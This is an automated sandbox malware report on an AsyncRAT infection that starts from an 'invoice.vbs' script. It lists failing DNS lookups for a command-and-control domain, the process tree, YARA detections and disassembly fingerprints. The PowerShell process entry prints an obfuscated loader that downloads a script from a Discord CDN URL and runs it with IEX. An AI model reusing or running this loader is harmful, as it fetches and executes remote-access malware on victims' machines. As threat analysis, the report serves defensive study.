Aug 3, 2021 22:59:02.739706039 CEST	8.8.8.8	192.168.2.3	0x399f	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:08.812978983 CEST	8.8.8.8	192.168.2.3	0x582f	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:12.783869028 CEST	8.8.8.8	192.168.2.3	0x582f	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:15.925398111 CEST	8.8.8.8	192.168.2.3	0xb0e5	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:18.908701897 CEST	8.8.8.8	192.168.2.3	0xb0e5	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:19.916956902 CEST	8.8.8.8	192.168.2.3	0xb0e5	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:21.970822096 CEST	8.8.8.8	192.168.2.3	0x2d20	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:25.970768929 CEST	8.8.8.8	192.168.2.3	0x2d20	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:28.020617962 CEST	8.8.8.8	192.168.2.3	0x7bdb	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:32.019942045 CEST	8.8.8.8	192.168.2.3	0x7bdb	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:33.104481936 CEST	8.8.8.8	192.168.2.3	0x5881	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:38.153395891 CEST	8.8.8.8	192.168.2.3	0x1ed8	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:43.203515053 CEST	8.8.8.8	192.168.2.3	0x4fde	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:48.319499016 CEST	8.8.8.8	192.168.2.3	0x2ead	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:53.374861956 CEST	8.8.8.8	192.168.2.3	0x77a5	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 22:59:58.425638914 CEST	8.8.8.8	192.168.2.3	0x9034	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 23:00:03.505693913 CEST	8.8.8.8	192.168.2.3	0x8b7	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 23:00:08.567926884 CEST	8.8.8.8	192.168.2.3	0xd516	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)
Aug 3, 2021 23:00:14.630897999 CEST	8.8.8.8	192.168.2.3	0xd0c5	Server failure (2)	ahmed2611.linkpc.net	none	none	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 3, 2021 22:56:08.361340046 CEST	162.159.130.233	443	192.168.2.3	49722	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Tue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:46:39 CET 2020	Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0	54328bd36c14bd82ddaa0c04b25ed9ad
Aug 3, 2021 22:56:08.361340046 CEST	162.159.130.233	443	192.168.2.3	49722	CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:46:39 CET 2020	Wed Jan 01 00:59:59 CET 2025		54328bd36c14bd82ddaa0c04b25ed9ad

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 5616 Parent PID: 3388

General

Start time:	22:56:03
Start date:	03/08/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\invoice.vbs'
Imagebase:	0x7ff755530000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.201434500.000002777ABB5000.00000004.00000020.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.202016822.000002777C910000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.200969823.000002777ACDB000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.201502033.000002777ACD5000.00000004.00000040.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6080 Parent PID: 5616

General

Start time:	22:56:04
Start date:	03/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');
Imagebase:	0x7ff785e30000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.275049815.0000019FB696D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4560 Parent PID: 6080

General

Start time:	22:56:04
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: aspnet_compiler.exe PID: 1536 Parent PID: 6080

General

Start time:	22:56:32
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x1d0000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: aspnet_compiler.exe PID: 4652 Parent PID: 6080

General

Start time:	22:56:33
Start date:	03/08/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x7ff6883e0000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: powershell.exe PID: 6080 Parent PID: 5616 powershell.exeCOMMON

Executed Functions

Function 00007FFAEE565282, Relevance: 1.7, Strings: 1, Instructions: 476COMMON

Download Yara Rule

Strings

^_^, xrefs: 00007FFAEE5652B1

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID: ^_^
API String ID: 0-4237115300
Opcode ID: 833ea094d55a2e5dbade9f0cd75d63d0c7d4fcf765f5fab0cf7b5b8f2aa99172
Instruction ID: 5d2dee8cf2f1c37cf7c5031519b15041cc1a25fa8dfb349a5d3829492064447a
Opcode Fuzzy Hash: 833ea094d55a2e5dbade9f0cd75d63d0c7d4fcf765f5fab0cf7b5b8f2aa99172
Instruction Fuzzy Hash: 0AE1E331A0CA4A8FDF84EF6CC4A5AE97BE1FF69310F1542B6D00DC7296CA64A845C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE637D0D, Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

XDz, xrefs: 00007FFAEE637D4D

Memory Dump Source

Source File: 00000003.00000002.283919787.00007FFAEE630000.00000040.00000001.sdmp, Offset: 00007FFAEE630000, based on PE: false

Similarity

API ID:
String ID: XDz
API String ID: 0-2363326355
Opcode ID: 26d25e53707111398fd06ed1aa31c801cac006fc735d54f39730fead1e2708c9
Instruction ID: 1ee130faa9ae448e150500343c5ae1a00f08bd9615e6f2262c9acc1e9410a1e7
Opcode Fuzzy Hash: 26d25e53707111398fd06ed1aa31c801cac006fc735d54f39730fead1e2708c9
Instruction Fuzzy Hash: 80112472D0D6CA4FEB91AB6884812B8B7A1EF5A311B1580FEC04DCB1D3CD24A8418342

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE634ADC, Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

P?z, xrefs: 00007FFAEE634B1D

Memory Dump Source

Source File: 00000003.00000002.283919787.00007FFAEE630000.00000040.00000001.sdmp, Offset: 00007FFAEE630000, based on PE: false

Similarity

API ID:
String ID: P?z
API String ID: 0-4002163744
Opcode ID: f53b72e87866e8b2665aed4a7a902866f1ed798048919565f1a351a1dde65333
Instruction ID: 3c41887de39a3ff4f5feee3b1a358307f9825f7f66e02853392d7bcb970fdd6f
Opcode Fuzzy Hash: f53b72e87866e8b2665aed4a7a902866f1ed798048919565f1a351a1dde65333
Instruction Fuzzy Hash: A41136B2A0CAC60FEB94EBA885D16B8B791EF5A221B0841FFC04DC71D3CA14A841C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE63AC06, Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

jt\L, xrefs: 00007FFAEE63AC0D

Memory Dump Source

Source File: 00000003.00000002.283919787.00007FFAEE630000.00000040.00000001.sdmp, Offset: 00007FFAEE630000, based on PE: false

Similarity

API ID:
String ID: jt\L
API String ID: 0-1329796884
Opcode ID: bedf28adac4cf8ef9ee2370080501c39f7fb0bf3750fd7505a89b533ec6c28b8
Instruction ID: a0ead7add5cbbefff29d5f191b8064eb003264944a84b9eed2b8a772367a376e
Opcode Fuzzy Hash: bedf28adac4cf8ef9ee2370080501c39f7fb0bf3750fd7505a89b533ec6c28b8
Instruction Fuzzy Hash: 18F0E233B0CECE0FA2E9A75C28452B47BC1DFCA664B5942BAC68DD2293EC069C151285

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE564B83, Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11687ce906b60f4a60364adc1b714940b55cf0ff2288bdabd6d700fd082f97b9
Instruction ID: 889511c465b19eb92b3e1a0777ee524cfc95dfab22998e8f2b59d54478f62141
Opcode Fuzzy Hash: 11687ce906b60f4a60364adc1b714940b55cf0ff2288bdabd6d700fd082f97b9
Instruction Fuzzy Hash: 7BE1583161CB864FE749EB2CC8A16B17BE1FF56310F1541BED08AC72A3DA25B806C752

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE635DDD, Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283919787.00007FFAEE630000.00000040.00000001.sdmp, Offset: 00007FFAEE630000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0721885b87eb6d91bfa2417ac8646071ed9456f22dc55da4cf5dd33b8e875e44
Instruction ID: f99bcf04a4f96c1fa8fe69d6e321433c9a1e0030bb44555e52612574900b7893
Opcode Fuzzy Hash: 0721885b87eb6d91bfa2417ac8646071ed9456f22dc55da4cf5dd33b8e875e44
Instruction Fuzzy Hash: C6D1367180EBC95FD7569B399C956B57FA0EF87224B0A41FFD08DC7093DA189806C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE630FC4, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283919787.00007FFAEE630000.00000040.00000001.sdmp, Offset: 00007FFAEE630000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416b3aa7ca09e2c67a09a2ed382bcbc223f2d1782167e3dfa7ef378d2d9d928a
Instruction ID: 16afd11df432fdf4407c78eff9a3cd8c1e9c2a8f002ac89ce53c5ad6251cbb64
Opcode Fuzzy Hash: 416b3aa7ca09e2c67a09a2ed382bcbc223f2d1782167e3dfa7ef378d2d9d928a
Instruction Fuzzy Hash: 14814972F1DBC74BE7A9AB6D48A52B576E2DFC6750B4980BED04EC32C3DE489C054242

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE6310BD, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283919787.00007FFAEE630000.00000040.00000001.sdmp, Offset: 00007FFAEE630000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a071ab45c6fdba6189914f166cab64b31210b1e6fadf4666c6019caff088f90
Instruction ID: ea9a0bc324c486523b5ba1ed1d5f6cdd4070347558ff16c20926a4638f578573
Opcode Fuzzy Hash: 4a071ab45c6fdba6189914f166cab64b31210b1e6fadf4666c6019caff088f90
Instruction Fuzzy Hash: E6310372F1DBCA4BE7E9A72D18A92B466E2DFC6650B4980FED40DC33C7DD489C050242

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE56782C, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b23901d564b4d5ae2cc2660b103960a2dc0656f3b4c21e192c4614b551477a28
Instruction ID: 1eff5772c0667080d199093823af5a3f89b65940b8d7d343d085ff99fb4d760b
Opcode Fuzzy Hash: b23901d564b4d5ae2cc2660b103960a2dc0656f3b4c21e192c4614b551477a28
Instruction Fuzzy Hash: 10311A30A18A098FDF84EF58C495EADB7E1FF69304F504169E40ED3296CA64EC81CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE56752A, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc175d4c33b05c5dacf727091d4454b294457cb26a2425405930241962350db
Instruction ID: ff2d0eca0f3bdd285c0b94b2b55b4e5527986f24f21d7ee7f900d15b20b28289
Opcode Fuzzy Hash: 1dc175d4c33b05c5dacf727091d4454b294457cb26a2425405930241962350db
Instruction Fuzzy Hash: 8B01D472B1CB855FE758DE0CA8965F133D2E799324F50057DE08AC33AAD926F8428781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE561755, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
Instruction ID: a7c222164875e6ecddf09b4a3e8bbb083bb7733b3669cd5910ae09b07fb65a4e
Opcode Fuzzy Hash: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
Instruction Fuzzy Hash: 8201677111CB0C4FDB44EF0CE451AB6B7E0FB99324F10056DE58AC7651DA36E882CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE567FEA, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd2870cce31eb251d4649080335be9e88a8a6484975ff85e5c01726a2fba2811
Instruction ID: 58d3fb635bf8c5706415d7ecd15d25cd65f81f49edb8c4f331e7aec00efa9598
Opcode Fuzzy Hash: dd2870cce31eb251d4649080335be9e88a8a6484975ff85e5c01726a2fba2811
Instruction Fuzzy Hash: A601567081890E9EEB98EF64C4AD6BE77B4FF19304F11487EE42ED2190DAB4A140CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE63163C, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283919787.00007FFAEE630000.00000040.00000001.sdmp, Offset: 00007FFAEE630000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da67ca92513580ce849402c70cadd95e6b9cde318a23e449baf702b00e71ad52
Instruction ID: f00eb60994a0ff9e76e7309238177bb7cd470516d85e3503cdab2bbed996d04d
Opcode Fuzzy Hash: da67ca92513580ce849402c70cadd95e6b9cde318a23e449baf702b00e71ad52
Instruction Fuzzy Hash: 65F0F632F0CE4A0BFAE9A79D18652B8A1D2DFCB76479E40BBD50DC3287DC05DC150281

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE56759F, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6edb690a654d922691fdd605a42de0838447df6b95732df663fab57bcc2aa715
Instruction ID: 023c894b9dfadd656073a8c90e410d179b19c263aa33619a0f7810cf72849e18
Opcode Fuzzy Hash: 6edb690a654d922691fdd605a42de0838447df6b95732df663fab57bcc2aa715
Instruction Fuzzy Hash: 56F0547271CB444FD75CDA0CE8529B573D1E795334F50012EF08BC2696E916B8428646

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE5691A1, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49d66cd363f256b03e88304b6d69c19e75477761a97baaea76e6e34d7f010029
Instruction ID: e62902dea46a6936c08e3698dc3bafe3985b440c0ef8388e4ad3c71fa9930bdd
Opcode Fuzzy Hash: 49d66cd363f256b03e88304b6d69c19e75477761a97baaea76e6e34d7f010029
Instruction Fuzzy Hash: CCF08C70C0868A8FEB94AF2488A92FE7BB4FF05300F41457AD81DC2191EBB491548742

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE564F28, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ccf45394e1573922b2d76d617be1696a761ebfdd4f64dc6943f95d20b2b49d
Instruction ID: 5f212c9c50fb0047244fa2ff183ddec7f967b6940796538daf7b4f6769de3150
Opcode Fuzzy Hash: 00ccf45394e1573922b2d76d617be1696a761ebfdd4f64dc6943f95d20b2b49d
Instruction Fuzzy Hash: 9EF0303276C6044FDB4CAA0CF8539B573D1E789224B40416EE48AC2696E916B8428686

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFAEE56884A, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6ecd5afe1fbaa232b04f11399cb05d5f168663646b85c3cc04c522c68c65cd
Instruction ID: 699098ccc970c83c66160dcacb79d01414fd8e1ce7335820a7fca6c8b5b0f149
Opcode Fuzzy Hash: fb6ecd5afe1fbaa232b04f11399cb05d5f168663646b85c3cc04c522c68c65cd
Instruction Fuzzy Hash: 7BF01270C1925B8FEB019FA684A57FDBBB4AF05310F01847ED1699B282DBFC2545CB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFAEE5682AA, Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

^_^+, xrefs: 00007FFAEE56832A
^_^%, xrefs: 00007FFAEE568312
^_^', xrefs: 00007FFAEE56831A
^_^), xrefs: 00007FFAEE568322

Memory Dump Source

Source File: 00000003.00000002.283764420.00007FFAEE560000.00000040.00000001.sdmp, Offset: 00007FFAEE560000, based on PE: false

Similarity

API ID:
String ID: ^_^%$^_^'$^_^)$^_^+
API String ID: 0-2107316527
Opcode ID: b5afd9f238f99c0755ff5bc2a016653c2fa2c849624c5e0201392ea210a1bcd1
Instruction ID: c1dcf12f860b13e5ec40ec38be2d53bd0654205e2846bff60e7d666303a76ec4
Opcode Fuzzy Hash: b5afd9f238f99c0755ff5bc2a016653c2fa2c849624c5e0201392ea210a1bcd1
Instruction Fuzzy Hash: 262107A7A2852556C6007EBDF4A12C87351EFA4635F450576C3ECCB102E636BC9E8AC0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aspnet_compiler.exe PID: 4652 Parent PID: 6080 aspnet_compiler.exeCOMMON

Executed Functions

Function 01541738, Relevance: 2.9, Strings: 2, Instructions: 439COMMON

Download Yara Rule

Strings

,, xrefs: 0154186F
#Sl^, xrefs: 01541B51

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID: ,$#Sl^
API String ID: 0-63274464
Opcode ID: 5bf9276005e7fc388cf399d1f3ed05329eb79316e332119bcc589b1022ccb1eb
Instruction ID: fd4f29fd9f11139fea5b46fe2f1ecfe90622142bb104dc1473724486c5920e6d
Opcode Fuzzy Hash: 5bf9276005e7fc388cf399d1f3ed05329eb79316e332119bcc589b1022ccb1eb
Instruction Fuzzy Hash: 7A02A8347042018FDB24AF64D580B6DB7E6BF85348F258929D9069F3A6DF74EC85CB82

Uniqueness

Uniqueness Score: -1.00%

Function 01541728, Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

,, xrefs: 0154186F
#Sl^, xrefs: 01541B51

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID: ,$#Sl^
API String ID: 0-63274464
Opcode ID: 21c26e267e7553f9d781b066274a21ab3076ec1ff998b9889502820119c623ef
Instruction ID: 9f3b0e524bb7c75047afdc3dd1e19e7382c2878f453a78489318a1a9099cbc67
Opcode Fuzzy Hash: 21c26e267e7553f9d781b066274a21ab3076ec1ff998b9889502820119c623ef
Instruction Fuzzy Hash: 57C1A8747002008FEB14AF64D594B69B7E2BF86348F25892DD9059F3A6DF74EC89CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01540AC8, Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f5bdc79878b5ccecb4cbbdcbe91064408df99362cf7ef9bc9532e45611d5f35
Instruction ID: b61eaec10684d0178b6b9eaa21f06f1206787f01c204d481849aa8845f1c96c7
Opcode Fuzzy Hash: 5f5bdc79878b5ccecb4cbbdcbe91064408df99362cf7ef9bc9532e45611d5f35
Instruction Fuzzy Hash: D191B170B041189FCB44DF78C454AAEBBF6AF89704F25816AE506DF7A6CB30DC468B91

Uniqueness

Uniqueness Score: -1.00%

Function 01540920, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe08701fee376cd040fc11fa2fcbd53a438fc0ac2d214ef13a37153ed5de5e4a
Instruction ID: a022631b73f71c7ec6407817c97478c42134ff0cc4d3dc10f4e50f61d9495a17
Opcode Fuzzy Hash: fe08701fee376cd040fc11fa2fcbd53a438fc0ac2d214ef13a37153ed5de5e4a
Instruction Fuzzy Hash: 5341BD307042148FDB15DF69C454AAEBBF2BF89208F1584AAE505DB3A1CB74DC09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015406A0, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf02da2b10b0579e470151dec2d6b8640220e16ee2e2a5cad5c3f4cbe345f8a
Instruction ID: 93b9a7275c3d2edb1f3ba9b33b6f1ae362d99dc946c5f34196f807b426577e09
Opcode Fuzzy Hash: fdf02da2b10b0579e470151dec2d6b8640220e16ee2e2a5cad5c3f4cbe345f8a
Instruction Fuzzy Hash: 9551093460530ACFDB65EF34E1588897366FB852CD3509929D802CB239EB39ED46CF81

Uniqueness

Uniqueness Score: -1.00%

Function 015406B0, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e59615b6f8813490aca49112a644a6669ed150d450d12abca275ddb052b1c33e
Instruction ID: 5a216d11f04fdad736d4b7fc0fabc5d97dd052e5bc0a4578e613b520a0b2494b
Opcode Fuzzy Hash: e59615b6f8813490aca49112a644a6669ed150d450d12abca275ddb052b1c33e
Instruction Fuzzy Hash: 4251083460530ACFDB65EF34E158859736AFB852CD3509929D801CB239EB39ED46CF81

Uniqueness

Uniqueness Score: -1.00%

Function 01540AB8, Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f7add3245c72b04b3138b8695b9dc5885ebf7cf33f90dd9ff1575308cf0b2b
Instruction ID: 4994d3079b49dea17bdbd07229739e028adb104c91f64ce9c72d9de8eef7c9a1
Opcode Fuzzy Hash: b0f7add3245c72b04b3138b8695b9dc5885ebf7cf33f90dd9ff1575308cf0b2b
Instruction Fuzzy Hash: D9414A30B101148FCB44DF69D498AAEBBF6AF89B14F258069E906DF3B5CB70DC018B91

Uniqueness

Uniqueness Score: -1.00%

Function 01540910, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a948b1bcbc163ca34ca89c303176c61f0330f2985e17442e1b3e1a1f40609065
Instruction ID: 8a1d1f8dfc2287bb5375678ca3f723f893b392973decf1228fd931a3155822c2
Opcode Fuzzy Hash: a948b1bcbc163ca34ca89c303176c61f0330f2985e17442e1b3e1a1f40609065
Instruction Fuzzy Hash: FA319C74A002058FDB14DF69C454AEEBBF2FF88304F288569E545AB7A1CB71EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01540F39, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
